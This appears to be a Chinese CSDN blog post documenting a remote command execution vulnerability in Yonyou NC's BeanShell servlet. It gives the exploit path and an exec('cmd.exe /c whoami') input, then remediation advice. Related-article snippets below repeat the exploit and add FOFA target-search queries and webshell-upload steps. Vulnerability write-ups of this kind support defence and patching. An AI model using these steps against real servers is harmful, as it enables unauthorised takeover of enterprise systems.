X友NC远程命令执行

最新推荐文章于 2023-07-22 22:52:21 发布
最新推荐文章于 2023-07-22 22:52:21 发布
阅读量1.7k 收藏
点赞数
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51345872/article/details/127065895
版权

一、漏洞描述

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令。

二、漏洞利用

1. 访问http://xxxxxxx/servlet/~ic/bsh.servlet.BshServlet

2. 在Script中输入 exec("cmd.exe /c whoami") 即可执行命令
在这里插入图片描述

三、漏洞修复

  1. 打补丁,升级到最新版本
  2. 严格限制访问权限
仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!
Web摆烂人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC_FileReceiveServlet_命令执行(含批量验证poc)
weixin_43567873的博客
04-17 26
用友NC_FileReceiveServlet_命令执行(含批量验证poc)
用友NC BeanShell远程代码执行
最新发布
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
NC上传拿WEBSHELL教程
11-24
NC上传拿WEBSHELL教程,学习有关网络攻击技术。
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 5051
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
NC抓包改包上传拿shell
系统运维
04-08 473
1通过各种方法获得网站的管理员帐号和密码 2找到网站的后台登录地址 3用获得的帐号、密码登录网站后台 4登录后悲剧的发现,网站只允许上传的文件格式为jpg、gif等,不允许上传asp格式的文件,所以可以尝试着通过nc抓包改包拿shell 5找到上传图片的位置 6讲asp格式的小马改成jpg格式 7点击浏览,选择要上传的xiao.jpg文件,但不要点击选择文件对话框的打开按钮,为...
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5037
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8764
用友NC 漏洞汇总
安全狐】用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
安全狐
06-06 2358
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 0x01漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。 0x02漏洞影响 用友 NC6.5版本 数据源于[安恒信息应急响应中心] 0x03漏洞复现 FOFA语句 icon_hash=“10859417
用友NC bash.servlet.BshServlet 远程命令执行漏洞复现
panda的博客
09-16 9425
用友NC bash.servlet.BshServlet 远程命令执行漏洞 漏洞成因: 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 复现过程 一:寻找可测试页面 使用FOFA对使用用友NC的页面进行搜索,如图所示: 找到打开为用友NC的页面,
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 478
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
nc命令 设置路由
01-09
nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。...
NC eclipse 远程调试
02-09
NC eclipse 远程调试
Linux 中的nc命令小结
09-15
主要介绍了linux中的nc命令知识,非常不错,值得收藏,需要的朋参考下吧
linux nc命令小结
09-15
主要介绍了linux nc命令小结,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
Redredredfish的博客
09-15 4652
漏洞简介 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。 貌似所有版本都存在。 漏洞复现 ①FOFA上挑选一位幸运儿,访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面 ②Script下输入框输入命令,点击Evaluate可直接执行 执行exec("whoa
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
用友NC BeanShell存在命令执行漏洞(CNVD-2021-30167)
maverickpig的博客
03-10 6078
用友命令执行漏洞复现
用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露
weixin_45908624的博客
01-16 1597
NC 6.X 远程命令执行漏洞
X NC 远程命令执行
thelostworld
06-09 1377
X NC 远程命令执行一、漏洞简介用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)二、漏洞影响用友NC 全版本三、漏洞复现主页样式漏洞url:/servlet/~ic/bsh.servlet.BshServle
linux隔几秒执行一次nc命令
06-09
在Linux中,可以使用crontab命令定时执行nc命令nc命令是一个用于网络连接的工具,可以在终端中执行TCP或UDP连接,也可以用于端口扫描和监听等操作。 具体步骤如下: 1. 打开终端,输入以下命令创建一个新的crontab任务: ``` crontab -e ``` 2. 在打开的文件中,输入以下内容: ``` */5 * * * * nc -z -w5 127.0.0.1 80 ``` 其中,*/5表示每隔5分钟执行一次,-z表示不发送任何数据,只检查连接是否成功,-w5表示设置5秒超时时间,127.0.0.1是要连接的IP地址,80是要连接的端口号。可以根据实际需要修改执行时间、IP地址和端口号。 3. 保存并退出文件。 这样,crontab就会在每隔5分钟执行一次nc命令,检查是否能够连接指定的IP地址和端口号。如果连接成功,不会有输出信息;如果连接失败,会输出相应的错误信息。 注意,crontab命令执行时间依赖于系统时间,如果系统时间不准确,可能会导致定时任务执行时间不准确。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值